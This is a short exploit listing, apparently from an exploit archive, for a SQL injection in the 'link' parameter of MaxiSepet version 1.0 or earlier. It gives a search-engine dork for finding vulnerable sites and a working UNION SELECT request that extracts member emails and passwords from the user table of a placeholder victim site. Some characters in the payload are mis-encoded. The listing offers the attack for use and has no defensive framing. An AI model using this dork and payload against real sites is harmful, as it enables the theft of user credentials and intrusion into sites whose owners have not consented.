Exploit for unknown platform in category web applications
===================================================
MaxiSepet <= 1.0 (link) SQL Injection Vulnerability
===================================================
#Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability.
#Dork: "Copyright MaxiSepet ©"
#How: Parameter link did not sanitized properly.
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Ьye%20adi:%20<b>',email,'</b><br>','Юifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
# 0day.today [2018-01-03] #